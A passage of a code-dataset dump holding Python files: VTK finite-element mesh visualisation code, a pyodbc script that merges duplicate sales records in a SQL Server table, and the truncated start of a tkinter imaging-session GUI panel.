field.setupOnGrid(self.gridRecord.uGrid)\n self.gridMapper= vtk.vtkDataSetMapper()\n self.gridMapper.SetInputData(self.gridRecord.uGrid)\n if(field):\n field.setupOnMapper(self.gridMapper)\n elemActor= vtk.vtkActor()\n elemActor.SetMapper(self.gridMapper)\n elemActor.GetProperty().SetColor(color[0],color[1],color[2])\n\n if(reprType==\"points\"):\n elemActor.GetProperty().SetRepresentationToPoints()\n elif(reprType==\"wireframe\"):\n elemActor.GetProperty().SetRepresentationToWireFrame()\n elif(reprType==\"surface\"):\n elemActor.GetProperty().SetRepresentationToSurface()\n else:\n className= type(self).__name__\n methodName= sys._getframe(0).f_code.co_name\n lmsg.error(className+'.'+methodName+\"; Representation type: '\"+ reprType+ \"' unknown.\")\n self.renderer.AddActor(elemActor)\n if(field):\n field.creaColorScaleBar()\n self.renderer.AddActor2D(field.scalarBar)\n\n def VtkDefineNodesActor(self, radius):\n '''Define the actor to display nodes.\n\n :param radius: radius of the sphere used as symbol to represent nodes.\n '''\n sphereSource= vtk.vtkSphereSource()\n sphereSource.SetRadius(radius)\n sphereSource.SetThetaResolution(5)\n sphereSource.SetPhiResolution(5)\n\n markNodes= vtk.vtkGlyph3D()\n markNodes.SetInputData(self.gridRecord.uGrid)\n markNodes.SetSourceData(sphereSource.GetOutput())\n markNodes.ScalingOff()\n markNodes.OrientOff()\n\n mappNodes= vtk.vtkPolyDataMapper()\n mappNodes.SetInputData(markNodes.GetOutput())\n visNodes= vtk.vtkActor()\n visNodes.SetMapper(mappNodes)\n visNodes.GetProperty().SetColor(rd.random(),rd.random(),rd.random())\n self.renderer.AddActor(visNodes)\n\n def VtkLoadElemMesh(self, field: fields.ScalarField, defFScale=0.0,eigenMode=None):\n '''Load the element mesh\n\n :param field: scalar field to be represented\n :param defFScale: factor to apply to current displacement of nodes \n so that the display position of each node equals to\n the initial position plus its displacement multiplied\n by this factor. In case of modal analysis, the displayed \n position of each node equals to the initial position plus\n its eigenVector multiplied by this factor.\n (Defaults to 0.0, i.e. display of initial/undeformed shape)\n :param eigenMode: eigenvibration mode if we want to display the \n deformed shape associated with it when a modal \n analysis has been carried out. \n Defaults to None: no modal analysis.\n '''\n # Define grid\n self.nodes= vtk.vtkPoints()\n self.gridRecord.uGrid= vtk.vtkUnstructuredGrid()\n self.gridRecord.uGrid.SetPoints(self.nodes)\n eSet= self.gridRecord.xcSet\n eSet.numerate()\n self.gridRecord.uGrid.name= eSet.name+'_grid'\n # Scalar values.\n nodeSet= eSet.nodes\n numNodes= len(nodeSet)\n if(numNodes>0):\n if(field):\n arr= field.fillArray(nodeSet)\n if(__debug__):\n if(not arr):\n AssertionError('Can\\'t create the array.')\n field.creaLookUpTable() \n # Load nodes in vtk\n if eigenMode is None:\n for n in nodeSet:\n pos= n.getCurrentPos3d(defFScale)\n self.nodes.InsertPoint(n.getIdx,pos.x,pos.y,pos.z)\n else:\n for n in nodeSet:\n pos= n.getEigenPos3d(defFScale,eigenMode)\n self.nodes.InsertPoint(n.getIdx,pos.x,pos.y,pos.z)\n # Load elements in vtk\n setElems= eSet.elements\n for e in setElems:\n vertices= xc_base.vector_int_to_py_list(e.getIdxNodes)\n vtx= vtk.vtkIdList()\n for vIndex in vertices:\n vtx.InsertNextId(vIndex)\n if(e.getVtkCellType!= vtk.VTK_VERTEX):\n self.gridRecord.uGrid.InsertNextCell(e.getVtkCellType,vtx)\n setConstraints= eSet.getConstraints\n for c in setConstraints:\n if(hasattr(c,'getIdxNodes')):\n vertices= xc_base.vector_int_to_py_list(c.getIdxNodes)\n vtx= vtk.vtkIdList()\n for vIndex in vertices:\n vtx.InsertNextId(vIndex)\n if(c.getVtkCellType!= vtk.VTK_VERTEX):\n self.gridRecord.uGrid.InsertNextCell(c.getVtkCellType,vtx)\n return True\n else:\n className= type(self).__name__\n methodName= sys._getframe(0).f_code.co_name\n lmsg.warning(className+'.'+methodName+\"; error when drawing set: '\"+eSet.name+\"', it has no nodes so I can't get set geometry (use fillDownwards?)\")\n return False\n \n \n\n def defineMeshScene(self, field: fields.ScalarField, defFScale= 0.0, eigenMode= None, color= xc.Vector([rd.random(),rd.random(),rd.random()])):\n '''Define the scene for the mesh\n\n :param field: scalar field to be represented\n :param defFScale: factor to apply to current displacement of nodes \n so that the display position of each node equals to\n the initial position plus its displacement multiplied\n by this factor. (Defaults to 0.0, i.e. display of \n initial/undeformed shape)\n :param eigenMode: eigenvibration mode if we want to display the \n deformed shape associated with it when a modal \n analysis has been carried out. \n Defaults to None: no modal analysis.\n :param color: RGB color to represent the elements (defaults to random\n color)\n '''\n retval= self.VtkLoadElemMesh(field, defFScale, eigenMode)\n self.renderer= vtk.vtkRenderer()\n self.renderer.SetBackground(self.bgRComp,self.bgGComp,self.bgBComp)\n self.VtkDefineNodesActor(0.002)\n self.VtkDefineElementsActor(\"surface\", field, color)\n self.renderer.ResetCamera()\n return retval\n\n #Implement labels.\n # if(self.gridRecord.entToLabel==\"elementos\"):\n # VtkDisplayIdsElements(self.renderer)\n # elif(self.gridRecord.entToLabel==\"nodes\"):\n # vtk_define_mesh_nodes.VtkDisplayIdsNodes(self.renderer)\n # else:\n # print(\"Entity: \", self.gridRecord.entToLabel, \" unknown.\")\n\n def FEmeshGraphic(self,setToDisplay,caption= '',cameraParameters= vtk_graphic_base.CameraParameters('XYZPos'),defFScale=0.0):\n ''' Graphic of the FE mesh\n\n :param setToDisplay: XC set of elements to be displayed\n :param caption: text to write in the graphic\n :param cameraParameters: camera parameters (position, orientation,...).\n :param defFScale: factor to apply to current displacement of nodes \n so that the display position of each node equals to\n the initial position plus its displacement multiplied\n by this factor. (Defaults to 0.0, i.e. display of \n initial/undeformed shape)\n '''\n className= type(self).__name__\n methodName= sys._getframe(0).f_code.co_name\n lmsg.warning(className+'.'+methodName+'; FEmeshGraphic DEPRECATED use displayFEMesh.')\n self.cameraParameters= cameraParameters\n self.displayFEMesh(setToDisplay,caption,defFScale)\n\n def displayFEMesh(self, setToDisplay, caption= '', defFScale=0.0):\n ''' Graphic of the FE mesh\n\n :param setToDisplay: XC set of elements to be displayed.\n :param caption: text title to write in the graphic.\n :param defFScale: factor to apply to current displacement of nodes \n so that the display position of each node equals to\n the initial position plus its displacement multiplied\n by this factor. (Defaults to 0.0, i.e. display of \n initial/undeformed shape)\n '''\n self.setupGrid(setToDisplay)\n self.defineMeshScene(field= None)\n self.displayScene(caption= caption)\n \n def displayLocalAxes(self,setToDisplay,caption= 'local axis', vectorScale=1.0, fileName= None, defFScale= 0.0):\n '''Display the element local axes.\n\n :param setToDisplay: set of elements to be displayed (defaults to total set)\n :param caption: text to display in the graphic \n :param vectorScale: factor to apply to the vectors length in the representation\n :param fileName: file name to store the image. If none -> window on screen.\n :param defFScale: factor to apply to current displacement of nodes \n so that the display position of each node equals to\n the initial position plus its displacement multiplied\n by this factor. (Defaults to 0.0, i.e. display of \n initial/undeformed shape)\n '''\n self.setupGrid(setToDisplay)\n elementAvgSize= setToDisplay.elements.getAverageSize(False)\n LrefModSize= setToDisplay.getBnd(defFScale).diagonal.getModulus()\n vScale= vectorScale*min(elementAvgSize, .15*LrefModSize) \n vField= lavf.LocalAxesVectorField(setToDisplay.name+'_localAxes',vScale)\n vField.dumpVectors(setToDisplay)\n self.defineMeshScene(field= None) \n vField.addToDisplay(self)\n self.displayScene(caption, fileName)\n\n def displayStrongWeakAxis(self, setToDisplay, caption= 'strong [red] and weak [blue] axes', vectorScale=1.0):\n '''vector field display of the loads applied to the chosen set of elements in the load case passed as parameter\n\n :param setToDisplay: set of elements to be displayed (defaults to total set)\n :param caption: text to display in the graphic \n :param vectorScale: factor to apply to the vectors length in the representation\n '''\n self.setupGrid(setToDisplay)\n vField= lavf.StrongWeakAxisVectorField(setToDisplay.name+'_strongWeakAxis',vectorScale)\n vField.dumpVectors(setToDisplay)\n self.defineMeshScene(field= None) \n vField.addToDisplay(self)\n self.displayScene(caption)\n\n def defineMeshActorsSet(self, elemSet, field: fields.ScalarField, defFScale, nodeSize):\n ''' Define mesh\n\n :param elemSet: set of elements that form the mesh to display.\n :param field: scalar field to be represented\n :param defFScale: factor to apply to current displacement of nodes \n so that the display position of each node equals to\n the initial position plus its displacement multiplied\n by this factor. (Defaults to 0.0, i.e. display of \n initial/undeformed shape)\n :param nodeSize: size of the spheres that represent nodes.\n '''\n self.setupGrid(elemSet)\n if elemSet.color.Norm()==0:\n elemSet.color=xc.Vector([rd.random(),rd.random(),rd.random()])\n self.VtkLoadElemMesh(field,defFScale,eigenMode=None)\n self.VtkDefineNodesActor(nodeSize)\n self.VtkDefineElementsActor(\"surface\", field, elemSet.color)\n\n def displayMesh(self, xcSets, field: fields.ScalarField = None, diagrams= None, caption= '',fileName= None, defFScale=0.0, nodeSize=0.01, scaleConstr= 0.2):\n '''Display the finite element mesh \n\n :param xcSets: set or list of sets to be displayed\n :param field: scalar field to show (optional)\n :param diagrams: diagrams to show (optional)\n :param caption: text to display in the graphic.\n :param fileName: name of the graphic file to create (if None -> screen window).\n :param defFScale: factor to apply to current displacement of nodes \n so that the display position of each node equals to\n the initial position plus its displacement multiplied\n by this factor. (Defaults to 0.0, i.e. display of \n initial/undeformed shape)\n :param nodeSize: size of the spheres that represent nodes (defaults to\n 0.01)\n :param scaleConstr: scale of SPConstraints symbols (defaults to 0.2)\n '''\n self.renderer= vtk.vtkRenderer()\n self.renderer.SetBackground(self.bgRComp,self.bgGComp,self.bgBComp)\n if(type(xcSets)==list):\n for s in xcSets:\n self.defineMeshActorsSet(s, field, defFScale, nodeSize)\n self.displaySPconstraints(s, scaleConstr, defFScale)\n else:\n self.defineMeshActorsSet(xcSets, field, defFScale, nodeSize)\n self.displaySPconstraints(xcSets, scaleConstr, defFScale)\n self.renderer.ResetCamera()\n if(diagrams):\n for d in diagrams:\n self.appendDiagram(d)\n self.displayScene(caption,fileName)\n\n def displayLoadOnNode(self, nod, color, force, moment, fScale,defFScale=0.0):\n '''Display loads on one node\n\n :param nod: node instance\n :param color: color\n :param force: force (displayed as a single arrow)\n :param moment: moment (displayed as a double arrow)\n :param fScale: scaling factor (forces and moments)\n :param defFScale: factor to apply to current displacement of nodes \n so that the display position of each node equals to\n the initial position plus its displacement multiplied\n by this factor. (Defaults to 0.0, i.e. display of \n initial/undeformed shape)\n '''\n #actorName= baseName+\"%04d\".format(nod.tag) # Node tag.\n pos= nod.getCurrentPos3d(defFScale)\n absForce= force.Norm()\n if(absForce>1e-6):\n utils_vtk.drawVtkSymb('arrow',self.renderer,color,pos,force,fScale*absForce)\n absMoment= moment.Norm()\n if(absMoment>1e-6):\n utils_vtk.drawVtkSymb('doubleArrow',self.renderer,color,pos,moment,fScale*absMoment)\n\n def displayNodalLoads(self, preprocessor, loadPattern, color, fScale):\n '''Display the all nodal loads defined in a load pattern\n\n :param preprocessor: preprocessor\n :param loadPattern: load pattern\n :param color: color of the symbols (arrows)\n :param fScale: factor to apply to current displacement of nodes \n so that the display position of each node equals to\n the initial position plus its displacement multiplied\n by this factor. (Defaults to 0.0, i.e. display of \n initial/undeformed shape)\n '''\n loadPattern.addToDomain()\n #loadPatternName= loadPattern.getProp(\"dispName\")\n lIter= loadPattern.loads.getNodalLoadIter\n load= lIter.next()\n while not(load is None):\n #actorName= \"flecha\"+loadPatternName+'{:04d}'.format(load.tag) # Tag force.\n nodeTag= load.getNodeTag\n node= preprocessor.getNodeHandler.getNode(nodeTag)\n force= load.getForce\n moment= load.getMoment\n self.displayLoadOnNode(node, color, force, moment,fScale) \n load= lIter.next()\n loadPattern.removeFromDomain()\n\n\n def displayElementPunctualLoad(self, preprocessor, pLoad,loadPattern, renderer, color, force, fScale):\n '''Display punctual loads on elements\n '''\n xForce= pLoad.getElems()\n eleTags= pLoad.elementTags\n loadPatternName= loadPattern.getProp(\"dispName\")\n actorName= \"flechaP\"+loadPatternName+'{:04d}'.format(pLoad.tag) # Tag force.\n for tag in eleTags:\n ele= preprocessor.getElementHandler.getElement(tag)\n actorName+= '{:04d}'.format(tag) # element identifier.\n pos= ele.point(xForce)\n utils_vtk.drawVtkSymb('arrow',self.renderer,color,pos,force,fScale)\n\n def displayElementUniformLoad(self, preprocessor, unifLoad,loadPattern, color, force, fScale):\n loadPatternName= loadPattern.getProp(\"dispName\")\n actorName= \"flechaU\"+loadPatternName+'{:04d}'.format(unifLoad.tag)\n eleTags= unifLoad.elementTags\n for tag in eleTags:\n # ele= preprocessor.getElementHandler.getElement(tag)\n actorName+= '{:04d}'.format(tag) # element identifier.\n className= type(self).__name__\n methodName= sys._getframe(0).f_code.co_name\n lmsg.error(className+'.'+methodName+'; displayElementUniformLoad not implemented.')\n # points= ele.getPoints(3,1,1,True)\n # i= 0\n # for capa in points:\n # for pos in capa: \n # print(pos)\n # utils_vtk.drawArrow(self.renderer,color,pos,force,fScale*force.Norm())\n # i+= 1\n\n def displayElementalLoads(self, preprocessor,loadPattern, color, fScale):\n # loadPattern.addToDomain()\n # eleLoadIter= loadPattern.loads.getElementalLoadIter\n # eleLoad= eleLoadIter.next()\n className= type(self).__name__\n methodName= sys._getframe(0).f_code.co_name\n lmsg.error(className+'.'+methodName+'; displayElementalLoads not implemented.')\n # while not(eleLoad is None):\n # force= eleLoad.getGlobalForces()\n # category= eleLoad.category\n # if(category==\"uniform\"):\n # self.displayElementUniformLoad(preprocessor, eleLoad,loadPattern,color,force,fScale)\n # else:\n # self.displayElementPunctualLoad(preprocessor, eleLoad,loadPattern,color,force,fScale)\n # loadPattern.removeFromDomain()\n\n def displayLoads(self, preprocessor, loadPattern):\n clrVectores= loadPattern.getProp(\"color\")\n fScaleVectores= loadPattern.getProp(\"scale\")\n self.displayElementalLoads(preprocessor, loadPattern, clrVectores, fScaleVectores)\n self.displayNodalLoads(preprocessor, loadPattern,clrVectores,fScaleVectores)\n\n def appendDiagram(self,diagram,orientScbar=1,titleScbar=None):\n '''\n :param orientScbar: orientation of the scalar bar (defaults to 1-horiz)\n :param titleScbar: title for the scalar bar (defaults to None)\n '''\n diagram.addDiagramToScene(self,orientScbar,titleScbar)\n\n def displaySPconstraints(self, setToDisplay, scale, defFScale=0.0):\n ''' Display single point constraints.\n\n :param setToDisplay: set to be displayed\n :param scale: scale for SPConstraints symbols.\n :param defFScale: factor to apply to current displacement of nodes \n so that the display position of each node equals to\n the initial position plus its displacement multiplied\n by this factor. (Defaults to 0.0, i.e. display of \n initial/undeformed shape)\n '''\n prep= setToDisplay.getPreprocessor\n nodInSet= setToDisplay.nodes.getTags()\n elementAvgSize= setToDisplay.elements.getAverageSize(False)\n LrefModSize= setToDisplay.getBnd(defFScale).diagonal.getModulus()\n cScale= scale*min(elementAvgSize, .15*LrefModSize)\n #direction vectors for each DOF\n vx,vy,vz=[1,0,0],[0,1,0],[0,0,1]\n DOFdirVct=(vx,vy,vz,vx,vy,vz)\n spIter= prep.getDomain.getConstraints.getSPs\n sp= spIter.next()\n while sp:\n nod= sp.getNode\n if nod.tag in nodInSet:\n dof= sp.getDOFNumber\n if dof < 3: # This is not true in 2D problems.\n utils_vtk.drawVtkSymb(symbType='cone',renderer=self.renderer, RGBcolor=[0,0,1], vPos=nod.getInitialPos3d, vDir=DOFdirVct[dof], scale= cScale)\n else:\n utils_vtk.drawVtkSymb(symbType='shaftkey',renderer=self.renderer, RGBcolor=[0,1,0], vPos=nod.getInitialPos3d, vDir=DOFdirVct[dof], scale= cScale)\n sp= spIter.next()\n return\n \ndef VtkLoadIdsNodes(recordGrid):\n '''Load node labels. Not yet implemented.'''\n nodeLabels= create_array_set_data.VtkCreaStrArraySetData(recordGrid.setName,\"nodes\",\"etiqNod\",\"tag\")()\n if(__debug__):\n if(not nodeLabels):\n AssertionError('Can\\'t create the labels.')\n recordGrid.GetPointData().SetStrings('etiqNod')\n\ndef VtkDisplayIdsNodes(recordGrid, renderer):\n '''Display node labels (not implemented yet)'''\n ids= vtk.vtkIdFilter()\n ids.SetInput(recordGrid.uGrid)\n ids.CellIdsOff()\n ids.PointIdsOff()\n\n VtkLoadIdsNodes(recordGrid)\n\n visPts= vtk.vtkSelectVisiblePoints()\n visPts.SetInput(\"ids\")\n visPts.SetRenderer(renderer)\n visPts.SelectionWindowOff()\n\n #Create the mapper to display the point ids. Specify the format to\n # use for the labels. Also create the associated actor.\n ldm= vtk.vtkLabeledShStrMapper()\n ldm.SetInput(\"visPts\")\n ldm.LabelTextProperty().SetColor(0.1,0.1,0.1)\n nodeLabels= vtk.vtkActor2D().SetMapper(ldm)\n renderer.AddActor2D(nodeLabels)\n\ndef VtkDisplayIdsElements(ids):\n '''Display element labels. Not implemented yet.'''\n cc= vtk.vtkCellCenters()\n vtk.SetInput(ids) # Cell centroids. \n\n visCells= vtk.vtkSelectVisiblePoints()\n visCells.SetInput(cc)\n visCells.SetRenderer(\"renderer\")\n visCells.SelectionWindowOff()\n\n #Create the mapper to display the cell ids. Specify the format to\n # use for the labels. Also create the associated actor.\n\n cellMapper= vtk.vtkLabeledShStrMapper\n cellMapper.SetInput(visCells)\n cellMapper.LabelTextProperty().SetColor(0,0,0.9)\n\n cellLabels= vtk.vtkActor2D()\n cellLabels.SetMapper(cellMapper)\n","repo_name":"xcfem/xc","sub_path":"python_modules/postprocess/xcVtk/FE_model/vtk_FE_graphic.py","file_name":"vtk_FE_graphic.py","file_ext":"py","file_size_in_byte":23497,"program_lang":"python","lang":"en","doc_type":"code","stars":196,"dataset":"github-code","pt":"31"} +{"seq_id":"25103018888","text":"import pyodbc\nfrom sqlalchemy import create_engine\nimport pandas as pd\nfrom app import config\n\nserver = config['server']\nbd = config['bd']\nusuario = config['usuario']\ncontrasena = config['contrasena']\n\ntry:\n conexion = pyodbc.connect('DRIVER={ODBC Driver 17 for SQL server}; SERVER='+server+'; DATABASE='+bd+'; UID='+usuario+';PWD='+contrasena)\n cur = conexion.cursor()\n print(\"conexion exitosa\")\nexcept Exception as ex:\n print(ex)\n\ncur.execute(\"select fecha, nombre_local, tamanio, sabor from registro_tortelin group by fecha, nombre_local, tamanio, sabor having count(*) > 1\")\nduplicados = cur.fetchall()\nprint(duplicados)\n\nfor fecha, local, tamaño, sabor in duplicados:\n print(fecha, local, tamaño, sabor)\n cur.execute(\"select unidades_vendidas, unidades_desechadas, precio_dia from registro_tortelin where nombre_local= ? and tamanio = ? and sabor = ? and fecha = ?\", local, tamaño, sabor, fecha)\n duplicado = cur.fetchall()\n print(duplicado)\n univend = duplicado[0][0] + duplicado[1][0]\n unidesech = duplicado[0][1] + duplicado[1][1]\n if duplicado[0][0] == duplicado[0][1] and duplicado[0][1] == duplicado[1][1] and duplicado[0][2] == duplicado[1][2]:\n print(\"completamente iguales\")\n else:\n if duplicado[0][2] > duplicado[1][2]:\n precio = duplicado[0][2]\n cur.execute(\"update registro_tortelin set unidades_vendidas = ?, unidades_desechadas = ? where nombre_local=? and tamanio =? and sabor = ? and fecha = ? and precio_dia = ?;\", univend, unidesech, local, tamaño, sabor, fecha, precio)\n cur.execute(\"delete from registro_tortelin where unidades_vendidas = ? and unidades_desechadas = ? and nombre_local=? and tamanio =? and sabor = ? and fecha = ? and precio_dia = ?;\", duplicado[1][0], duplicado[1][1], local, tamaño, sabor, fecha, duplicado[1][2])\n conexion.commit()\n else:\n precio = duplicado[1][2]\n cur.execute(\"update registro_tortelin set unidades_vendidas = ?, unidades_desechadas = ? where nombre_local=? and tamanio =? and sabor = ? and fecha = ? and precio_dia = ?;\", univend, unidesech, local, tamaño, sabor, fecha, precio)\n cur.execute(\"delete from registro_tortelin where unidades_vendidas = ? and unidades_desechadas = ? and nombre_local=? and tamanio =? and sabor = ? and fecha = ? and precio_dia = ?;\", duplicado[0][0], duplicado[0][1], local, tamaño, sabor, fecha, duplicado[0][2])\n conexion.commit() \n\n\ncur.execute(\"EXEC ELIMINAR_REGISTROS;\")\nconexion.commit()","repo_name":"24Ours/ETL_Python_Tortelin","sub_path":"eliminar_duplicados.py","file_name":"eliminar_duplicados.py","file_ext":"py","file_size_in_byte":2538,"program_lang":"python","lang":"es","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"22191158277","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Thu Jan 13 09:18:34 2022\n\n@author: sp3660\n\"\"\"\nimport matplotlib as mpl\nimport os\nimport tkinter as tk\nfrom tkinter import Canvas,END, Label, RAISED, Text, WORD, StringVar, Button, ttk, Listbox, Scrollbar\nfrom tkinter import ttk\nimport matplotlib.pyplot as plt\nfrom matplotlib.backends.backend_tkagg import FigureCanvasTkAgg, NavigationToolbar2Tk\nfrom matplotlib.backend_bases import key_press_handler\nfrom matplotlib.figure import Figure\nfrom project_manager.ProjectManager import ProjectManager\ntry :\n from .scrollbarFrame import ScrollbarFrame\nexcept:\n from scrollbarFrame import ScrollbarFrame\nimport time\n\nimport numpy as np\nimport shutil\nimport sys\nfrom pprint import pprint\nmpl.rcParams['axes.prop_cycle'] = mpl.cycler(color=[\"k\", \"r\", \"b\",'g','y','c','m', 'tab:brown']) \n\nmpl.rcParams['pdf.fonttype'] = 42\nmpl.rcParams['ps.fonttype'] = 42\nmpl.rcParams['font.family'] = 'Arial'\n\n#%% class definition\nclass ImagingSessionPanel(tk.Toplevel):\n def __init__(self, gui, session_date=None, datamanaging=None):\n tk.Toplevel.__init__(self, gui) #inst\n if datamanaging:\n self.datamanaging=datamanaging\n elif gui:\n self.gui_ref=gui \n self.datamanaging=self.gui_ref.datamanaging\n self.geometry(\"+2555+0\")\n self.session_date=session_date\n#%%'Imaging Session' \n # self.vmax_default=1\n # self.vmax=self.vmax_default\n self.frames_names=['Session Info Frame',\n 'Acquisition Frame', \n # 'Message Box'\n ]\n self.frames={}\n for i in range(len(self.frames_names)):\n self.frames[self.frames_names[i]]=ttk.Frame(self, borderwidth = 4, relief='groove')\n \n self.grid_columnconfigure(0, weight=1)\n self.grid_rowconfigure(0, weight=2)\n self.grid_rowconfigure(1, weight=3)\n # self.grid_rowconfigure(2, weight=1)\n\n \n self.frames[self.frames_names[0]].grid(row=0, column=0, sticky=\"nswe\") \n self.frames[self.frames_names[1]].grid(row=1, column=0, sticky=\"nswe\") \n # self.frames[self.frames_names[2]].grid(row=2, column=0, sticky=\"nswe\") \n\n\n \n#%%'Imaging Session Info Frame' \n \n self.frame1=self.frames[self.frames_names[0]]\n \n self.frame1.frames_names=['Selections Frame',\n 'Metadata-Info Frame', \n 'Widefield Frame'\n ]\n self.frame1.frames={}\n for i in range(len(self.frame1.frames_names)):\n self.frame1.frames[self.frame1.frames_names[i]]=ttk.Frame(self.frame1, borderwidth = 4, relief='groove')\n \n self.frame1.grid_columnconfigure(0, weight=2)\n self.frame1.grid_columnconfigure(1, weight=1)\n self.frame1.grid_columnconfigure(2, weight=3)\n self.frame1.grid_rowconfigure(0, weight=1)\n self.frame1.grid_rowconfigure(1, weight=1)\n\n \n self.frame1.frames[self.frame1.frames_names[0]].grid(row=0, column=0, sticky=\"nswe\") \n self.frame1.frames[self.frame1.frames_names[1]].grid(row=0, column=1, sticky=\"nswe\") \n self.frame1.frames[self.frame1.frames_names[2]].grid(row=0, column=2, sticky=\"nswe\") \n\n \n \n#%%'Imaging Session Info Frame SELECTIONS frame' \n\n self.frame1.frame1=self.frame1.frames[self.frame1.frames_names[0]]\n \n self.frame1.frame1.litbox_names=['Mouse_selection', \n 'acquisition_selection', \n 'dataset_selection1',\n 'dataset_selection2',\n 'dataset_selection3',\n 'dataset_selection4'\n ]\n\n self.frame1.frame1.listboxes={}\n self.frame1.frame1.listbox_variables={}\n self.frame1.frame1.scrollbar ={}\n \n for i, litbox_name in enumerate(self.frame1.frame1.litbox_names):\n self.frame1.frame1.listbox_variables[litbox_name]=StringVar() \n self.frame1.frame1.listboxes[litbox_name]=Listbox(self.frame1.frame1, listvariable=self.frame1.frame1.listbox_variables[litbox_name], width=10, height=10, exportselection=0)\n self.frame1.frame1.scrollbar [litbox_name]= Scrollbar(self.frame1.frame1) \n self.frame1.frame1.listboxes[litbox_name].config(yscrollcommand = self.frame1.frame1.scrollbar [litbox_name].set)\n self.frame1.frame1.scrollbar [litbox_name].config(command = self.frame1.frame1.listboxes[litbox_name].yview)\n \n self.get_mouse_imaged() \n self.get_all_objects()\n\n \n self.frame1.frame1.listboxes[ self.frame1.frame1.litbox_names[0]].bind('<>', self.get_mouse_info_and_data)\n self.frame1.frame1.listboxes[self.frame1.frame1.litbox_names[1]].bind('<>', self.get_acquisition_info)\n self.frame1.frame1.listboxes[self.frame1.frame1.litbox_names[2]].bind('<>', self.get_dataset_info)\n self.frame1.frame1.listboxes[self.frame1.frame1.litbox_names[3]].bind('<>', self.get_dataset_info)\n self.frame1.frame1.listboxes[self.frame1.frame1.litbox_names[4]].bind('<>', self.get_dataset_info)\n self.frame1.frame1.listboxes[self.frame1.frame1.litbox_names[5]].bind('<>', self.get_dataset_info)\n\n\n\n\n for i, litbox in enumerate(self.frame1.frame1.listboxes.values()):\n if i==0:\n litbox.grid(column=0, row=0)\n elif i==1:\n litbox.grid(column=0, row=1)\n elif i==2:\n litbox.grid(column=1, row=0)\n elif i==3:\n litbox.grid(column=1, row=1) \n elif i==4:\n litbox.grid(column=1, row=2)\n elif i==5:\n litbox.grid(column=1, row=3) \n\n\n # self.frame1.frame1.buttons={}\n # self.frame1.frame1.buttons_names=['Open acquisition directory',\n # 'Swicth tomato(if 3plane ac)', \n # 'Open dataset directory'\n # ]\n # self.frame1.frame1.buttons_commands=[self.open_directory_button, \n # self.switch_red_button,\n # self.open_dataset_button,\n # ] \n # for i, butt in enumerate( self.frame1.frame1.buttons_names):\n # self.frame1.frame1.buttons[ butt]= ttk.Button( self.frame1.frame1 , text= self.frame1.frame1.buttons_names[i], command= self.frame1.frame1.buttons_commands[i])\n\n\n # for i, name in enumerate(self.frame1.frame1.buttons_names):\n # self.frame1.frame1.buttons[name].grid(column=0, row=i+3) \n\n\n#%%'Imaging Session Info Frame METADATA frame' \n \n self.frame1.frame2=self.frame1.frames[self.frame1.frames_names[1]]\n \n \n self.frame1.frame2.labels={}\n self.frame1.frame2.labels_names=['MouseCode', \n 'Age',\n 'Sex',\n 'Line',\n 'Genotype',\n 'Cage',\n 'Project',\n 'Ear Mark',\n 'Injection Date',\n 'Days From Injection',\n 'Window Date',\n 'Days From Window',\n 'Virus Combination',\n 'Dilution Sensor 1',\n 'Dilution Sensor 2',\n 'Dilution Opto',\n 'CoverType',\n 'Damaged Areas',\n 'InjectionSite1bleeding',\n 'InjectionSite2bleeding',\n 'Notes',\n 'Injection Notes',\n 'Window Notes',\n ]\n \n for i in range(len(self.frame1.frame2.labels_names)):\n self.frame1.frame2.labels[self.frame1.frame2.labels_names[i]]=ttk.Label(self.frame1.frame2, text=self.frame1.frame2.labels_names[i], width=25)\n \n # for i, label in enumerate(self.frame1.frame2.labels_names):\n # if i<8: \n # self.frame1.frame2.labels[label].grid(column=0, row=i) \n # elif i<16: \n # self.frame1.frame2.labels[label].grid(column=2, row=i-8)\n # else: \n # self.frame1.frame2.labels[label].grid(column=0, row=i-9)\n\n # self.frame1.frame2.labels_values={}\n # self.frame1.frame2.labels_values_variables={}\n\n # for i ,label in enumerate(self.frame1.frame2.labels_names):\n # self.frame1.frame2.labels_values_variables[label]=StringVar()\n # if i<18:\n # self.frame1.frame2.labels_values[label]=ttk.Label(self.frame1.frame2, textvariable= self.frame1.frame2.labels_values_variables[label], width=25)\n # else:\n # self.frame1.frame2.labels_values[label]=ttk.Label(self.frame1.frame2, textvariable= self.frame1.frame2.labels_values_variables[label], width=50)\n\n # for i, label in enumerate(self.frame1.frame2.labels_names):\n # if i<8: \n # self.frame1.frame2.labels_values[label].grid(column=1, row=i) \n\n # elif i<16: \n # self.frame1.frame2.labels_values[label].grid(column=3, row=i-8)\n # else:\n # self.frame1.frame2.labels_values[label].grid(column=1, row=i-9)\n \n for i, label in enumerate(self.frame1.frame2.labels_names):\n self.frame1.frame2.labels[label].grid(column=0, row=i) \n \n self.frame1.frame2.labels_values={}\n self.frame1.frame2.labels_values_variables={}\n \n for i ,label in enumerate(self.frame1.frame2.labels_names):\n self.frame1.frame2.labels_values_variables[label]=StringVar()\n self.frame1.frame2.labels_values[label]=ttk.Label(self.frame1.frame2, textvariable= self.frame1.frame2.labels_values_variables[label], width=80)\n \n for i, label in enumerate(self.frame1.frame2.labels_names):\n self.frame1.frame2.labels_values[label].grid(column=1, row=i) \n\n#%%'Imaging Session Info Frame WIDEFIELD frame' \n self.frame1.frame3=self.frame1.frames[self.frame1.frames_names[2]]\n \n self.frame1.frame3.fig = Figure(figsize=(4, 4), dpi=100)\n self.frame1.frame3.ax=self.frame1.frame3.fig.add_axes([0.1,0.1,0.8,0.8])\n self.frame1.frame3.canvas = FigureCanvasTkAgg(self.frame1.frame3.fig, master=self.frame1.frame3) # A tk.DrawingArea.\n self.frame1.frame3.canvas.draw()\n self.frame1.frame3.canvas.get_tk_widget().pack(side=tk.TOP, fill=tk.BOTH, expand=1) \n self.frame1.frame3.toolbar = NavigationToolbar2Tk(self.frame1.frame3.canvas, self.frame1.frame3)\n self.frame1.frame3.toolbar.update()\n self.frame1.frame3.canvas.get_tk_widget().pack(side=tk.TOP, fill=tk.BOTH, expand=1)\n \n\n#%%'AcquisitionFrame' \n self.frame2=self.frames[self.frames_names[1]]\n \n self.frame2.frames_names=['Facecam_Frame',\n 'Voltage_Frame', \n 'Metadata_Frame',\n 'Planes_Frame',\n ]\n \n self.frame2.frames={}\n for i in range(len(self.frame2.frames_names)):\n self.frame2.frames[self.frame2.frames_names[i]]=ScrollbarFrame(self.frame2, borderwidth = 4, relief='groove')\n \n self.frame2.grid_columnconfigure(0, weight=1)\n self.frame2.grid_columnconfigure(1, 